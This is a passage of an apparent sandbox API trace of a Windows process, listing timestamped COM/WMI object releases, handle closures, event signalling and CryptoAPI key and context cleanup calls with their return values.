0x1 [0133.646] WbemDefPath:IUnknown:Release (This=0x601ff00) returned 0x0 [0133.646] IUnknown:Release (This=0x6024d30) returned 0x0 [0133.646] IUnknown:Release (This=0x60245e0) returned 0x0 [0133.647] IUnknown:Release (This=0x6023e90) returned 0x0 [0133.647] IUnknown:Release (This=0x6023b48) returned 0x0 [0133.647] IUnknown:Release (This=0x6023800) returned 0x0 [0133.648] IUnknown:Release (This=0x6022ff0) returned 0x0 [0133.648] IUnknown:Release (This=0x6022d70) returned 0x0 [0133.648] CoGetContextToken (in: pToken=0x32bf7e0 | out: pToken=0x32bf7e0) returned 0x0 [0133.648] WbemLocator:IUnknown:Release (This=0xb5a8e4) returned 0x1 [0133.648] IUnknown:Release (This=0x6022c6c) returned 0x0 [0133.792] IUnknown:Release (This=0x6027568) returned 0x0 [0133.792] IUnknown:Release (This=0x6026ea8) returned 0x0 [0133.792] IUnknown:Release (This=0x6026bf0) returned 0x0 [0133.792] IUnknown:Release (This=0x6026908) returned 0x0 [0133.792] IUnknown:Release (This=0x6026650) returned 0x0 [0133.793] IUnknown:Release (This=0x6026368) returned 0x0 [0133.793] IUnknown:Release (This=0x6025080) returned 0x0 [0133.793] IUnknown:Release (This=0x6022990) returned 0x0 [0133.793] IUnknown:Release (This=0x6028648) returned 0x0 [0133.793] IUnknown:Release (This=0x60284b0) returned 0x0 [0133.794] CloseHandle (hObject=0x4b0) returned 1 [0133.794] IUnknown:Release (This=0x6028318) returned 0x0 [0133.794] IUnknown:Release (This=0x6028180) returned 0x0 [0133.795] IUnknown:Release (This=0x6027fe8) returned 0x0 [0133.795] IUnknown:Release (This=0x6027e50) returned 0x0 [0133.795] IUnknown:Release (This=0x6027cb8) returned 0x0 [0133.795] IUnknown:Release (This=0x601ef58) returned 0x0 [0133.795] IUnknown:Release (This=0x6027b20) returned 0x0 [0133.795] IUnknown:Release (This=0x6027850) returned 0x0 [0133.796] CloseHandle (hObject=0x3f4) returned 1 [0133.796] CloseHandle (hObject=0x30c) returned 1 [0133.796] CloseHandle (hObject=0x4b8) returned 1 [0133.796] CloseHandle (hObject=0x308) returned 1 [0133.796] CloseHandle (hObject=0x304) returned 1 [0133.796] CloseHandle (hObject=0x438) returned 1 [0133.797] CloseHandle (hObject=0x300) returned 1 [0133.797] CloseHandle (hObject=0x2fc) returned 1 [0133.798] CloseHandle (hObject=0x2f8) returned 1 [0133.798] CloseHandle (hObject=0x32c) returned 1 [0133.798] CloseHandle (hObject=0x2f4) returned 1 [0133.799] CloseHandle (hObject=0x4d0) returned 1 [0133.799] CloseHandle (hObject=0x328) returned 1 [0133.799] CloseHandle (hObject=0x2f0) returned 1 [0133.799] CloseHandle (hObject=0x324) returned 1 [0133.799] CloseHandle (hObject=0x428) returned 1 [0133.799] CloseHandle (hObject=0x320) returned 1 [0133.800] CloseHandle (hObject=0x45c) returned 1 [0133.800] CloseHandle (hObject=0x31c) returned 1 [0133.800] CloseHandle (hObject=0x420) returned 1 [0133.800] CloseHandle (hObject=0x318) returned 1 [0133.800] CloseHandle (hObject=0x2d8) returned 1 [0133.800] CloseHandle (hObject=0x4b4) returned 1 [0133.800] CloseHandle (hObject=0x314) returned 1 [0133.801] CloseHandle (hObject=0x408) returned 1 [0133.801] GetCurrentThreadId () returned 0x774 [0133.801] ResetEvent (hEvent=0xb8) returned 1 [0133.801] GetCurrentThreadId () returned 0x774 [0133.801] GetCurrentThreadId () returned 0x774 [0133.801] GetCurrentThreadId () returned 0x774 [0133.801] GetCurrentThreadId () returned 0x774 [0133.801] ResetEvent (hEvent=0xb8) returned 1 [0133.801] GetCurrentThreadId () returned 0x774 [0133.801] GetCurrentThreadId () returned 0x774 [0133.801] SetEvent (hEvent=0xbc) returned 1 [0133.801] SetEvent (hEvent=0xb8) returned 1 [0133.801] CloseHandle (hObject=0x510) returned 1 [0133.801] GetCurrentThreadId () returned 0x774 [0133.801] ResetEvent (hEvent=0xb8) returned 1 [0133.801] GetCurrentThreadId () returned 0x774 [0133.801] GetCurrentThreadId () returned 0x774 [0133.801] GetCurrentThreadId () returned 0x774 [0133.801] GetCurrentThreadId () returned 0x774 [0133.801] ResetEvent (hEvent=0xb8) returned 1 [0133.801] GetCurrentThreadId () returned 0x774 [0133.801] GetCurrentThreadId () returned 0x774 [0133.801] SetEvent (hEvent=0xbc) returned 1 [0133.802] SetEvent (hEvent=0xb8) returned 1 [0133.802] CloseHandle (hObject=0x500) returned 1 [0133.802] GetCurrentThreadId () returned 0x774 [0133.802] ResetEvent (hEvent=0xb8) returned 1 [0133.802] GetCurrentThreadId () returned 0x774 [0133.802] GetCurrentThreadId () returned 0x774 [0133.802] GetCurrentThreadId () returned 0x774 [0133.802] GetCurrentThreadId () returned 0x774 [0133.802] ResetEvent (hEvent=0xb8) returned 1 [0133.802] GetCurrentThreadId () returned 0x774 [0133.802] GetCurrentThreadId () returned 0x774 [0133.802] SetEvent (hEvent=0xbc) returned 1 [0133.802] SetEvent (hEvent=0xb8) returned 1 [0133.802] CloseHandle (hObject=0x504) returned 1 [0133.802] GetCurrentThreadId () returned 0x774 [0133.802] ResetEvent (hEvent=0xb8) returned 1 [0133.802] GetCurrentThreadId () returned 0x774 [0133.802] GetCurrentThreadId () returned 0x774 [0133.802] GetCurrentThreadId () returned 0x774 [0133.802] GetCurrentThreadId () returned 0x774 [0133.802] ResetEvent (hEvent=0xb8) returned 1 [0133.802] GetCurrentThreadId () returned 0x774 [0133.802] GetCurrentThreadId () returned 0x774 [0133.802] SetEvent (hEvent=0xbc) returned 1 [0133.802] SetEvent (hEvent=0xb8) returned 1 [0133.802] CloseHandle (hObject=0x508) returned 1 [0133.802] GetCurrentThreadId () returned 0x774 [0133.802] ResetEvent (hEvent=0xb8) returned 1 [0133.802] GetCurrentThreadId () returned 0x774 [0133.802] GetCurrentThreadId () returned 0x774 [0133.802] GetCurrentThreadId () returned 0x774 [0133.802] GetCurrentThreadId () returned 0x774 [0133.802] ResetEvent (hEvent=0xb8) returned 1 [0133.802] GetCurrentThreadId () returned 0x774 [0133.803] GetCurrentThreadId () returned 0x774 [0133.803] SetEvent (hEvent=0xbc) returned 1 [0133.803] SetEvent (hEvent=0xb8) returned 1 [0133.803] CloseHandle (hObject=0x50c) returned 1 [0133.804] GetCurrentThreadId () returned 0x774 [0133.804] ResetEvent (hEvent=0xb8) returned 1 [0133.804] GetCurrentThreadId () returned 0x774 [0133.804] GetCurrentThreadId () returned 0x774 [0133.804] GetCurrentThreadId () returned 0x774 [0133.804] GetCurrentThreadId () returned 0x774 [0133.804] ResetEvent (hEvent=0xb8) returned 1 [0133.804] GetCurrentThreadId () returned 0x774 [0133.804] GetCurrentThreadId () returned 0x774 [0133.804] SetEvent (hEvent=0xbc) returned 1 [0133.804] SetEvent (hEvent=0xb8) returned 1 [0133.804] CloseHandle (hObject=0x534) returned 1 [0133.805] GetCurrentThreadId () returned 0x774 [0133.805] ResetEvent (hEvent=0xb8) returned 1 [0133.805] GetCurrentThreadId () returned 0x774 [0133.805] GetCurrentThreadId () returned 0x774 [0133.805] GetCurrentThreadId () returned 0x774 [0133.805] GetCurrentThreadId () returned 0x774 [0133.805] ResetEvent (hEvent=0xb8) returned 1 [0133.805] GetCurrentThreadId () returned 0x774 [0133.805] GetCurrentThreadId () returned 0x774 [0133.805] SetEvent (hEvent=0xbc) returned 1 [0133.805] SetEvent (hEvent=0xb8) returned 1 [0133.805] CloseHandle (hObject=0x524) returned 1 [0133.805] GetCurrentThreadId () returned 0x774 [0133.805] ResetEvent (hEvent=0xb8) returned 1 [0133.805] GetCurrentThreadId () returned 0x774 [0133.805] GetCurrentThreadId () returned 0x774 [0133.805] GetCurrentThreadId () returned 0x774 [0133.805] GetCurrentThreadId () returned 0x774 [0133.805] ResetEvent (hEvent=0xb8) returned 1 [0133.805] GetCurrentThreadId () returned 0x774 [0133.805] GetCurrentThreadId () returned 0x774 [0133.805] SetEvent (hEvent=0xbc) returned 1 [0133.805] SetEvent (hEvent=0xb8) returned 1 [0133.805] CloseHandle (hObject=0x528) returned 1 [0133.805] GetCurrentThreadId () returned 0x774 [0133.805] ResetEvent (hEvent=0xb8) returned 1 [0133.805] GetCurrentThreadId () returned 0x774 [0133.805] GetCurrentThreadId () returned 0x774 [0133.805] GetCurrentThreadId () returned 0x774 [0133.805] GetCurrentThreadId () returned 0x774 [0133.805] ResetEvent (hEvent=0xb8) returned 1 [0133.805] GetCurrentThreadId () returned 0x774 [0133.805] GetCurrentThreadId () returned 0x774 [0133.806] SetEvent (hEvent=0xbc) returned 1 [0133.806] SetEvent (hEvent=0xb8) returned 1 [0133.806] CloseHandle (hObject=0x52c) returned 1 [0133.806] GetCurrentThreadId () returned 0x774 [0133.806] ResetEvent (hEvent=0xb8) returned 1 [0133.806] GetCurrentThreadId () returned 0x774 [0133.806] GetCurrentThreadId () returned 0x774 [0133.806] GetCurrentThreadId () returned 0x774 [0133.806] GetCurrentThreadId () returned 0x774 [0133.806] ResetEvent (hEvent=0xb8) returned 1 [0133.806] GetCurrentThreadId () returned 0x774 [0133.806] GetCurrentThreadId () returned 0x774 [0133.806] SetEvent (hEvent=0xbc) returned 1 [0133.806] SetEvent (hEvent=0xb8) returned 1 [0133.806] CloseHandle (hObject=0x530) returned 1 [0138.450] CoGetContextToken (in: pToken=0x32bf9c0 | out: pToken=0x32bf9c0) returned 0x0 [0138.451] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0138.451] WbemDefPath:IUnknown:Release (This=0x601cc08) returned 0x1 [0138.451] WbemDefPath:IUnknown:Release (This=0x601cc08) returned 0x0 [0138.451] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0138.451] WbemDefPath:IUnknown:Release (This=0x6010910) returned 0x1 [0138.451] WbemDefPath:IUnknown:Release (This=0x6010910) returned 0x0 [0138.451] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0138.451] WbemDefPath:IUnknown:Release (This=0x6010bf0) returned 0x1 [0138.451] WbemDefPath:IUnknown:Release (This=0x6010bf0) returned 0x0 [0138.451] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0138.451] WbemDefPath:IUnknown:Release (This=0x6021020) returned 0x1 [0138.451] WbemDefPath:IUnknown:Release (This=0x6021020) returned 0x0 [0138.451] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0138.451] WbemDefPath:IUnknown:Release (This=0x6022f08) returned 0x1 [0138.452] WbemDefPath:IUnknown:Release (This=0x6022f08) returned 0x0 [0138.452] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0138.452] WbemDefPath:IUnknown:Release (This=0x6023718) returned 0x1 [0138.452] WbemDefPath:IUnknown:Release (This=0x6023718) returned 0x0 [0138.452] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0138.452] WbemDefPath:IUnknown:Release (This=0x6023a60) returned 0x1 [0138.452] WbemDefPath:IUnknown:Release (This=0x6023a60) returned 0x0 [0138.452] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0138.452] WbemDefPath:IUnknown:Release (This=0x6023da8) returned 0x1 [0138.452] WbemDefPath:IUnknown:Release (This=0x6023da8) returned 0x0 [0138.452] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0138.452] WbemDefPath:IUnknown:Release (This=0x60244f8) returned 0x1 [0138.452] WbemDefPath:IUnknown:Release (This=0x60244f8) returned 0x0 [0138.452] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0138.452] WbemDefPath:IUnknown:Release (This=0x6024c48) returned 0x1 [0138.452] WbemDefPath:IUnknown:Release (This=0x6024c48) returned 0x0 [0138.452] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0138.452] WbemDefPath:IUnknown:Release (This=0x6024f98) returned 0x1 [0138.452] WbemDefPath:IUnknown:Release (This=0x6024f98) returned 0x0 [0138.452] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0138.452] WbemDefPath:IUnknown:Release (This=0x6025300) returned 0x1 [0138.453] WbemDefPath:IUnknown:Release (This=0x6025300) returned 0x0 [0138.453] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0138.453] WbemDefPath:IUnknown:Release (This=0x6025370) returned 0x1 [0138.453] WbemDefPath:IUnknown:Release (This=0x6025370) returned 0x0 [0138.453] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0138.453] WbemDefPath:IUnknown:Release (This=0x60253e0) returned 0x1 [0138.453] WbemDefPath:IUnknown:Release (This=0x60253e0) returned 0x0 [0138.453] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0138.453] WbemDefPath:IUnknown:Release (This=0x6025450) returned 0x1 [0138.453] WbemDefPath:IUnknown:Release (This=0x6025450) returned 0x0 [0138.453] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0138.453] WbemDefPath:IUnknown:Release (This=0x60254c0) returned 0x1 [0138.453] WbemDefPath:IUnknown:Release (This=0x60254c0) returned 0x0 [0138.453] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0138.453] WbemDefPath:IUnknown:Release (This=0x6025530) returned 0x1 [0138.453] WbemDefPath:IUnknown:Release (This=0x6025530) returned 0x0 [0138.453] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0138.453] WbemDefPath:IUnknown:Release (This=0x60255a0) returned 0x1 [0138.453] WbemDefPath:IUnknown:Release (This=0x60255a0) returned 0x0 [0138.453] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0138.453] WbemDefPath:IUnknown:Release (This=0x6025610) returned 0x1 [0138.453] WbemDefPath:IUnknown:Release (This=0x6025610) returned 0x0 [0138.453] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0138.454] WbemDefPath:IUnknown:Release (This=0x6025680) returned 0x1 [0138.454] WbemDefPath:IUnknown:Release (This=0x6025680) returned 0x0 [0138.454] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0138.454] WbemDefPath:IUnknown:Release (This=0x60256f0) returned 0x1 [0138.454] WbemDefPath:IUnknown:Release (This=0x60256f0) returned 0x0 [0138.454] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0138.454] WbemDefPath:IUnknown:Release (This=0x6025760) returned 0x1 [0138.454] WbemDefPath:IUnknown:Release (This=0x6025760) returned 0x0 [0138.454] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0138.454] WbemDefPath:IUnknown:Release (This=0x60257d0) returned 0x1 [0138.454] WbemDefPath:IUnknown:Release (This=0x60257d0) returned 0x0 [0138.454] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0138.454] WbemDefPath:IUnknown:Release (This=0x6025840) returned 0x1 [0138.454] WbemDefPath:IUnknown:Release (This=0x6025840) returned 0x0 [0138.454] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0138.454] WbemDefPath:IUnknown:Release (This=0x60258b0) returned 0x1 [0138.454] WbemDefPath:IUnknown:Release (This=0x60258b0) returned 0x0 [0138.454] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0138.454] WbemDefPath:IUnknown:Release (This=0x6025920) returned 0x1 [0138.454] WbemDefPath:IUnknown:Release (This=0x6025920) returned 0x0 [0138.454] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0138.454] WbemDefPath:IUnknown:Release (This=0x6025990) returned 0x1 [0138.454] WbemDefPath:IUnknown:Release (This=0x6025990) returned 0x0 [0138.455] CoGetContextToken (in: pToken=0x32bf9c0 | out: pToken=0x32bf9c0) returned 0x0 [0138.455] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0138.455] WbemLocator:IUnknown:Release (This=0xb5a9d4) returned 0x1 [0138.455] WbemLocator:IUnknown:Release (This=0x6010cb4) returned 0x0 [0138.657] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0138.657] WbemLocator:IUnknown:Release (This=0xb5aac4) returned 0x1 [0138.657] WbemLocator:IUnknown:Release (This=0x60210f4) returned 0x0 [0138.658] IUnknown:Release (This=0xb51e28) returned 0x0 [0138.659] GetCurrentThreadId () returned 0x774 [0138.659] ResetEvent (hEvent=0xb8) returned 1 [0138.659] GetCurrentThreadId () returned 0x774 [0138.659] GetCurrentThreadId () returned 0x774 [0138.659] GetCurrentThreadId () returned 0x774 [0138.659] GetCurrentThreadId () returned 0x774 [0138.659] ResetEvent (hEvent=0xb8) returned 1 [0138.659] GetCurrentThreadId () returned 0x774 [0138.659] GetCurrentThreadId () returned 0x774 [0138.659] SetEvent (hEvent=0xbc) returned 1 [0138.659] SetEvent (hEvent=0xb8) returned 1 [0138.659] CloseHandle (hObject=0x4e4) returned 1 [0138.659] GetCurrentThreadId () returned 0x774 [0138.659] ResetEvent (hEvent=0xb8) returned 1 [0138.660] GetCurrentThreadId () returned 0x774 [0138.660] GetCurrentThreadId () returned 0x774 [0138.660] GetCurrentThreadId () returned 0x774 [0138.660] GetCurrentThreadId () returned 0x774 [0138.660] ResetEvent (hEvent=0xb8) returned 1 [0138.660] GetCurrentThreadId () returned 0x774 [0138.660] GetCurrentThreadId () returned 0x774 [0138.660] SetEvent (hEvent=0xbc) returned 1 [0138.660] SetEvent (hEvent=0xb8) returned 1 [0138.660] CloseHandle (hObject=0x4d4) returned 1 [0138.660] GetCurrentThreadId () returned 0x774 [0138.660] ResetEvent (hEvent=0xb8) returned 1 [0138.660] GetCurrentThreadId () returned 0x774 [0138.660] GetCurrentThreadId () returned 0x774 [0138.660] GetCurrentThreadId () returned 0x774 [0138.660] GetCurrentThreadId () returned 0x774 [0138.660] ResetEvent (hEvent=0xb8) returned 1 [0138.660] GetCurrentThreadId () returned 0x774 [0138.660] GetCurrentThreadId () returned 0x774 [0138.660] SetEvent (hEvent=0xbc) returned 1 [0138.660] SetEvent (hEvent=0xb8) returned 1 [0138.660] CloseHandle (hObject=0x4d8) returned 1 [0138.660] GetCurrentThreadId () returned 0x774 [0138.660] ResetEvent (hEvent=0xb8) returned 1 [0138.660] GetCurrentThreadId () returned 0x774 [0138.661] GetCurrentThreadId () returned 0x774 [0138.661] GetCurrentThreadId () returned 0x774 [0138.661] GetCurrentThreadId () returned 0x774 [0138.661] ResetEvent (hEvent=0xb8) returned 1 [0138.661] GetCurrentThreadId () returned 0x774 [0138.661] GetCurrentThreadId () returned 0x774 [0138.661] SetEvent (hEvent=0xbc) returned 1 [0138.661] SetEvent (hEvent=0xb8) returned 1 [0138.661] CloseHandle (hObject=0x4dc) returned 1 [0138.661] GetCurrentThreadId () returned 0x774 [0138.661] ResetEvent (hEvent=0xb8) returned 1 [0138.661] GetCurrentThreadId () returned 0x774 [0138.661] GetCurrentThreadId () returned 0x774 [0138.661] GetCurrentThreadId () returned 0x774 [0138.661] GetCurrentThreadId () returned 0x774 [0138.661] ResetEvent (hEvent=0xb8) returned 1 [0138.661] GetCurrentThreadId () returned 0x774 [0138.661] GetCurrentThreadId () returned 0x774 [0138.661] SetEvent (hEvent=0xbc) returned 1 [0138.661] SetEvent (hEvent=0xb8) returned 1 [0138.661] CloseHandle (hObject=0x4e0) returned 1 [0141.110] CryptDestroyKey (hKey=0xb7f4d0) returned 1 [0141.110] CryptReleaseContext (hProv=0xbe0828, dwFlags=0x0) returned 1 [0141.110] CryptReleaseContext (hProv=0xbe0828, dwFlags=0x0) returned 1 [0141.643] CryptDestroyKey (hKey=0xb7f250) returned 1 [0141.643] CryptReleaseContext (hProv=0xbe0718, dwFlags=0x0) returned 1 [0141.643] CryptReleaseContext (hProv=0xbe0718, dwFlags=0x0) returned 1 [0141.644] CryptDestroyKey (hKey=0xb7f590) returned 1 [0141.644] CryptReleaseContext (hProv=0xbe08b0, dwFlags=0x0) returned 1 [0141.644] CryptReleaseContext (hProv=0xbe08b0, dwFlags=0x0) returned 1 [0141.644] CryptReleaseContext (hProv=0xb1e9d8, dwFlags=0x0) returned 1 [0141.645] CryptDestroyKey (hKey=0xb7f0d0) returned 1 [0141.645] CryptReleaseContext (hProv=0xbe0938, dwFlags=0x0) returned 1 [0141.645] CryptReleaseContext (hProv=0xbe0938, dwFlags=0x0) returned 1 [0141.645] CryptDestroyKey (hKey=0xb7f6d0) returned 1 [0141.645] CryptReleaseContext (hProv=0xb1e9d8, dwFlags=0x0) returned 1 [0143.850] CryptDestroyKey (hKey=0xb7f110) returned 1 [0143.850] CryptReleaseContext (hProv=0xbdf2e8, dwFlags=0x0) returned 1 [0143.850] CryptReleaseContext (hProv=0xbdf2e8, dwFlags=0x0) returned 1 [0143.850] CryptReleaseContext (hProv=0xbe0690, dwFlags=0x0) returned 1 [0143.850] CryptDestroyKey (hKey=0xb7f610) returned 1 [0143.850] CryptReleaseContext (hProv=0xbe0690, dwFlags=0x0) returned 1 [0144.028] CryptDestroyKey (hKey=0xb7f610) returned 1 [0144.028] CryptReleaseContext (hProv=0xbe0828, dwFlags=0x0) returned 1 [0144.028] CryptReleaseContext (hProv=0xbe0828, dwFlags=0x0) returned 1 [0144.928] CoGetContextToken (in: pToken=0x32bf9c0 | out: pToken=0x32bf9c0) returned 0x0 [0144.928] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0144.928] WbemLocator:IUnknown:Release (This=0x6024940) returned 0x1 [0144.928] WbemLocator:IUnknown:Release (This=0x6024940) returned 0x0 [0144.928] CryptReleaseContext (hProv=0xb1dc90, dwFlags=0x0) returned 1 [0144.928] CryptDestroyKey (hKey=0xb7f210) returned 1 [0144.928] CryptReleaseContext (hProv=0xb1e9d8, dwFlags=0x0) returned 1 [0144.929] CryptReleaseContext (hProv=0xb1e9d8, dwFlags=0x0) returned 1 [0144.929] CryptDestroyKey (hKey=0xb7ef90) returned 1 [0144.929] CryptReleaseContext (hProv=0xb1dc90, dwFlags=0x0) returned 1 [0146.658] CoGetContextToken (in: pToken=0x32bf9c0 | out: pToken=0x32bf9c0) returned 0x0 [0146.658] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0146.658] WbemLocator:IUnknown:Release (This=0x6024890) returned 0x1 [0146.658] WbemLocator:IUnknown:Release (This=0x6024890) returned 0x0 [0146.658] CryptDestroyKey (hKey=0xb7f0d0) returned 1 [0146.658] CryptReleaseContext (hProv=0xb1dc08, dwFlags=0x0) returned 1 [0146.659] CryptReleaseContext (hProv=0xb1dc08, dwFlags=0x0) returned 1 [0146.659] CryptDestroyKey (hKey=0xb7ef90) returned 1 [0146.659] CryptReleaseContext (hProv=0xb1dda0, dwFlags=0x0) returned 1 [0146.659] CryptReleaseContext (hProv=0xb1dda0, dwFlags=0x0) returned 1 [0146.659] CryptDestroyKey (hKey=0xb7f490) returned 1 [0146.659] CryptReleaseContext (hProv=0xbe0690, dwFlags=0x0) returned 1 [0146.659] CryptReleaseContext (hProv=0xbe0690, dwFlags=0x0) returned 1 [0147.594] CoGetContextToken (in: pToken=0x32bf9c0 | out: pToken=0x32bf9c0) returned 0x0 [0147.594] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0147.594] WbemLocator:IUnknown:Release (This=0x60248d0) returned 0x1 [0147.594] WbemLocator:IUnknown:Release (This=0x60248d0) returned 0x0 [0147.594] CryptDestroyKey (hKey=0xb7f490) returned 1 [0147.594] CryptReleaseContext (hProv=0xb1eae8, dwFlags=0x0) returned 1 [0147.594] CryptReleaseContext (hProv=0xb1eae8, dwFlags=0x0) returned 1 [0147.595] CryptDestroyKey (hKey=0xb7f990) returned 1 [0147.595] CryptReleaseContext (hProv=0xb1dc90, dwFlags=0x0) returned 1 [0147.595] CryptReleaseContext (hProv=0xb1dc90, dwFlags=0x0) returned 1 [0147.595] CryptDestroyKey (hKey=0xb7f190) returned 1 [0147.595] CryptReleaseContext (hProv=0xb1ebf8, dwFlags=0x0) returned 1 [0147.595] CryptReleaseContext (hProv=0xb1ebf8, dwFlags=0x0) returned 1 [0148.070] CryptDestroyKey (hKey=0xb7f190) returned 1 [0148.070] CryptReleaseContext (hProv=0xbdf508, dwFlags=0x0) returned 1 [0148.070] CryptReleaseContext (hProv=0xbdf508, dwFlags=0x0) returned 1 [0148.436] CoGetContextToken (in: pToken=0x32bf9c0 | out: pToken=0x32bf9c0) returned 0x0 [0148.436] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0148.436] WbemLocator:IUnknown:Release (This=0x6024980) returned 0x1 [0148.436] WbemLocator:IUnknown:Release (This=0x6024980) returned 0x0 [0148.436] CryptDestroyKey (hKey=0xb7f190) returned 1 [0148.436] CryptReleaseContext (hProv=0xbdf618, dwFlags=0x0) returned 1 [0148.437] CryptDestroyKey (hKey=0xb7f290) returned 1 [0148.437] CryptReleaseContext (hProv=0xbdf948, dwFlags=0x0) returned 1 [0148.437] CryptReleaseContext (hProv=0xbdf948, dwFlags=0x0) returned 1 [0148.437] CryptReleaseContext (hProv=0xbdf618, dwFlags=0x0) returned 1 [0148.437] CryptDestroyKey (hKey=0xb7f490) returned 1 [0148.437] CryptReleaseContext (hProv=0xbdf728, dwFlags=0x0) returned 1 [0148.437] CryptReleaseContext (hProv=0xbdf728, dwFlags=0x0) returned 1 [0149.793] CoGetContextToken (in: pToken=0x32bf9c0 | out: pToken=0x32bf9c0) returned 0x0 [0149.793] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0149.793] WbemLocator:IUnknown:Release (This=0x60249f0) returned 0x1 [0149.793] WbemLocator:IUnknown:Release (This=0x60249f0) returned 0x0 [0149.793] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0149.793] WbemLocator:IUnknown:Release (This=0x60249b0) returned 0x1 [0149.793] WbemLocator:IUnknown:Release (This=0x60249b0) returned 0x0 [0149.794] CryptDestroyKey (hKey=0xb7fad0) returned 1 [0149.794] CryptReleaseContext (hProv=0xbe00b8, dwFlags=0x0) returned 1 [0149.794] CryptReleaseContext (hProv=0xbe00b8, dwFlags=0x0) returned 1 [0149.795] CryptDestroyKey (hKey=0xb7f8d0) returned 1 [0149.795] CryptReleaseContext (hProv=0xb1ebf8, dwFlags=0x0) returned 1 [0149.795] CryptReleaseContext (hProv=0xb1ebf8, dwFlags=0x0) returned 1 [0150.777] CoGetContextToken (in: pToken=0x32bf9c0 | out: pToken=0x32bf9c0) returned 0x0 [0150.777] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0150.777] WbemLocator:IUnknown:Release (This=0x60249f0) returned 0x1 [0150.777] WbemLocator:IUnknown:Release (This=0x60249f0) returned 0x0 [0150.777] CryptDestroyKey (hKey=0xb7fad0) returned 1 [0150.777] CryptReleaseContext (hProv=0xbdf618, dwFlags=0x0) returned 1 [0150.777] CryptReleaseContext (hProv=0xbdf618, dwFlags=0x0) returned 1 [0150.778] CryptDestroyKey (hKey=0xb7fa10) returned 1 [0150.778] CryptReleaseContext (hProv=0xbe02d8, dwFlags=0x0) returned 1 [0150.778] CryptReleaseContext (hProv=0xbe02d8, dwFlags=0x0) returned 1 [0150.778] CryptDestroyKey (hKey=0xb7f850) returned 1 [0150.778] CryptReleaseContext (hProv=0xbdf948, dwFlags=0x0) returned 1 [0150.778] CryptReleaseContext (hProv=0xbdf948, dwFlags=0x0) returned 1 [0151.432] CoGetContextToken (in: pToken=0x32bf9c0 | out: pToken=0x32bf9c0) returned 0x0 [0151.432] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0151.432] WbemLocator:IUnknown:Release (This=0x6024b00) returned 0x1 [0151.432] WbemLocator:IUnknown:Release (This=0x6024b00) returned 0x0 [0151.432] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0151.432] WbemLocator:IUnknown:Release (This=0x6024aa0) returned 0x1 [0151.432] WbemLocator:IUnknown:Release (This=0x6024aa0) returned 0x0 [0151.432] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0151.432] WbemLocator:IUnknown:Release (This=0x6024a40) returned 0x1 [0151.432] WbemLocator:IUnknown:Release (This=0x6024a40) returned 0x0 [0151.432] CryptReleaseContext (hProv=0xb1dda0, dwFlags=0x0) returned 1 [0151.432] CryptReleaseContext (hProv=0xb1ee18, dwFlags=0x0) returned 1 [0151.433] CryptDestroyKey (hKey=0xb7fd90) returned 1 [0151.433] CryptReleaseContext (hProv=0xb1dc08, dwFlags=0x0) returned 1 [0151.433] CryptReleaseContext (hProv=0xb1dc08, dwFlags=0x0) returned 1 [0151.433] CryptDestroyKey (hKey=0xbe1468) returned 1 [0151.433] CryptReleaseContext (hProv=0xbdf948, dwFlags=0x0) returned 1 [0151.433] CryptReleaseContext (hProv=0xbdf948, dwFlags=0x0) returned 1 [0151.433] CryptDestroyKey (hKey=0xb7f190) returned 1 [0151.433] CryptReleaseContext (hProv=0xb1ebf8, dwFlags=0x0) returned 1 [0151.434] CryptReleaseContext (hProv=0xb1ebf8, 